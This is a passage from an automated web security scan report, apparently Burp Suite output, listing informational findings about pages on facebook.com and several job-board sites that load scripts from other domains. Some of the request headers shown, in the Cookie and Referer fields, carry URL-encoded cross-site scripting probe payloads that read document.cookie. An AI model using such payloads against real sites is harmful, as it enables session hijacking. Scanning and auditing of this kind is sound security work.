Referer: http://news.yahoo.com/s/nm/us_bankofamerica;_ylt=AlohsBp579RpJ1eBqn0kxP.s0NUE;_ylu=X3oDMTNobm1hMzM5BGFzc2V0A25tLzIwMTEwMTIxL3VzX2JhbmtvZmFtZXJpY2EEY2NvZGUDbW9zdHBvcHVsYXIEY3BvcwMzBHBvcwMxMQRwdANob21lX2Nva2UEc2VjA3luX3RvcF9zdG9yeQRzbGsDYmFua29mYW1lcmlj
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 18:19:10 GMT
Content-Length: 8036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yU/r/jKqmG9e3p5H.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.342. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/likebox.php?href=http://www.facebook.com/pages/JD2B/298408284363&width=557&colorscheme=light&connections=100&stream=true&header=true&height=557 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.jd2b.com/?f05bd%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf651820abc=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Djdjournal.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.jdjournal.com%252F2011%252F01%252F19%252Ffour-partners-from-vinson-elkins-join-gibson-dunn%252F%253F750aa%2527%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E9dfc99fca36%253D1%26extra_2%3DUS; wd=308x80

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-Cnection: close
Date: Fri, 21 Jan 2011 19:39:58 GMT
Content-Length: 13489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yL/r/xmHI_BAWBjI.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.343. http://www.facebook.com/yahoonews

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /yahoonews

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /yahoonews HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dtheclicker.todayshow.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Ftheclicker.todayshow.com%252F%253F28d8a%252522%25253E%25253Cscript%25253Ealert%2528document.cookie%2529%25253C%252Fscript%25253E1b20a3de4c0%253D1%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=A3j8b; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
Connection: close
Date: Fri, 21 Jan 2011 18:30:09 GMT
Content-Length: 31972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/yy/r/cscl9vxKKLW.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/yC/r/gmR3y_ARtaM.js"></script>
...[SNIP]...

15.344. http://www.facilitiescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facilitiescrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.facilitiescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:50 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=nc6a2h1em6s3batcv6fjsg17b1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:50 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:50 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117478

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.345. http://www.financialservicescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.financialservicescrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.financialservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:51 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=qsnigj0dejirrlqc4mq67l7kd4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117666

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.346. http://www.foodservicescrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodservicescrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.foodservicescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:26:53 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=eh1vjkcudnunpfbo2nu0rbgdm5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:26:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 110006

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.347. http://www.fundraisingcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fundraisingcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.fundraisingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:23 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=8b0film2tj8qfoehbgchdt1as6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97962

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.348. http://www.giscrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.giscrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.giscrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:26 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0a97dse4dq233td161telhv1q5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:26 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:26 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109314

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.349. http://www.governmentcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.governmentcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.governmentcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:48 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=7ipjkgrjvb62q6cj7quksggdq0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 117229

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...

15.350. http://www.graduateschoolloans.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.graduateschoolloans.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.graduateschoolloans.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:56 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=pv00mgmh60i7tksicjfc8juuq5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92867

<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws.js"></script>
<script type="text/javascript" src="http://www.graduateschoolloans.com/script/overlibmws_scroll.j
...[SNIP]...
<!-- Google Analytics Code for Non-Secure(HTTP) Pages Starts here -->
   <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
   </script>
...[SNIP]...
<!-- Powered by: Crafty Syntax Live Help http://www.craftysyntax.com/ -->
           <script type="text/javascript" src="http://128.121.234.97/livechat/livehelp_js.php?department=2&amp;pingtimes=15"></script>
...[SNIP]...
</noscript><script language='JavaScript' type='text/javascript' src='http://www.studentloanfoundation.org//tmviewbanner.php?lpgid=114&wsid=185&cid=4203&bid=350&compid=43&style=js&lpgprty=B&tp=B'></script>
...[SNIP]...

15.351. http://www.healthcarecrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthcarecrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.healthcarecrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:27:59 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pv7nj7m5sv3h8sbbsgp6rc6ju4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:59 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:27:59 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 140242

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
<link rel="icon" href="favicon.ico" type="image/vnd.microsoft.icon">
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/general.js"></SCRIPT>
<SCRIPT language=javascript type="text/javascript" src="http://script.employmentcrossing.com/video.js"></SCRIPT>
...[SNIP]...
<!--/* OpenX Javascript Tag v2.6.4 */-->
<script type='text/javascript' src='http://srvr12.pdcsrvr.com/media/www/empsc/fl.js'></script>
...[SNIP]...
<!-- search box starts here -->
<SCRIPT language=javascript type="text/javascript" src='http://script.employmentcrossing.com/bubble.js'></SCRIPT>
                       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<script language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/jquery/jquery.js"></script><script language="javascript" type='text/javascript' src='http://script.employmentcrossing.com/jquery/jquery.autocomplete.js'></script>
...[SNIP]...
<td colspan="2"><script language="javascript" src="http://www.aharrisonbarnes.com/script/ahbarnesnewsletter_signup.js"></script>
...[SNIP]...
<!-- code for welcome popup start -->
               <SCRIPT language="javascript" type="text/javascript" src="http://script.employmentcrossing.com/popup.js"></SCRIPT>
...[SNIP]...
<!-- Start Quantcast tag -->
       <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

15.352. http://www.helpdeskcrossing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.helpdeskcrossing.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.helpdeskcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=20p261b30i1nrgola0d06ago67; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:06 GMT
